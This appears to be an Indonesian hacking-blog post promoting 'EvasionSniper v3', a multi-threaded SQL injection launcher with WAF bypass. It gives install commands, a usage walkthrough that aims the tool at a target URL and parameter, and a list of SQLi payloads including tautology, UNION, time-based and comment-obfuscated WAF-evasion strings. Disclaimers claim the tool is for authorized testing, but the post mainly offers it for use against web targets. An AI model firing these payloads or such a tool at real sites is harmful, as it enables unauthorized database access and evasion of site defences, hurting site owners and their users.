[EvasionSniper v3] SQLi Payload Launcher with WAF Bypass

6ickzone 0

[EvasionSniper v3] SQLi Payload Launcher with WAF Bypass by 0x6ick

0x6ick kembali hadir dengan EvasionSniper v3, tools untuk para pentester brutal yang butuh payload-launcher cepat, multi-thread, dan support bypass WAF bawaan.

⚠️ Disclaimer: This toolsis stricly for educational purposes and authorized penetration testing only. I do not support or condone any illegal hacking activities. .

Fitur Utama

  • Built-in OWASP + Custom Payload Pool
  • Multi-threaded Launcher
  • Randomized Headers & Payload Obfuscation
  • Basic WAF Detection & Auto-switch
  • Auto-save hasil scan (jika >20 payload)
  • Fancy ASCII banner & Colored Output
  • Progress Counter & Friendly Prompt

(Contoh Output)

Instalasi & Clone

git clone https://github.com/6ickzone/EvasionSniper.git

cd EvasionSniper

pip install -r requirements.txt

Opsi Manual (bagi yang tidak bisa clone)

  1. Buka link raw script: https://raw.githubusercontent.com/6ickzone/EvasionSniper/main/main.py ).
  2. Di Termux atau Linux:
    3. curl -s https://raw.githubusercontent.com/6ickzone/EvasionSniper/main/main.py -o main.py

chmod +x main.py
  3. Pastikan `requirements.txt` terisi: 
    requests

colorama
  4. Install dependencies: 
    pip install -r requirements.txt

Cara Pakai

python3 main.py

# Lalu isi prompt:

# Enter target URL (e.g., http://site.com/page.php): http://target.com/index.php

# Enter vulnerable param (e.g., id): id

# Threads (default 5): [Enter]

# Custom payload file (optional): payloads.txt

# Save results to file (optional): result.txt

Tools akan otomatis menjalankan multi-threaded payload shots, menandai hasil Passed (200 OK), Blocked (403/406), dan menyimpan ke file jika diperlukan.

Daftar Payload OWASP (SQL Injection Bypassing WAF)

Referensi lengkap & varian tambahan: OWASP SQL Injection Bypassing WAF Cheat Sheet 

' OR '1'='1'--

' OR 1=1--

' UNION SELECT NULL--

' OR SLEEP(5)--

' OR benchmark(5000000,MD5(1))--

' OR 2 LIKE 2--

'/**/OR/**/1=1--

'/*!50000UNION*/ SELECT NULL--

...dan masih banyak lagi sesuai OWASP Cheat Sheet...
⚠️ Disclaimer Legal:
This tool is developed solely foreducational and authorized penetration testing only. Any misuse for unauthorized access, hacking, or criminal activities is strictly prohibited.. The author (0x6ick,NyxCode) is not responsible for any consequences arising from unlawful use..

Download & Contribute

👉 Clone atau fork repo di GitHub

Kamu juga bisa fork atau open issue untuk request fitur baru.

Next Update (v4)

– Auto-detect error-based & time-based SQLi
– Dynamic WAF fingerprinting & payload pools
– Progress bar & GUI ringan

Tags

6ickzone

I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.

Post a Comment

Posting Komentar

Lebih baru Lebih lama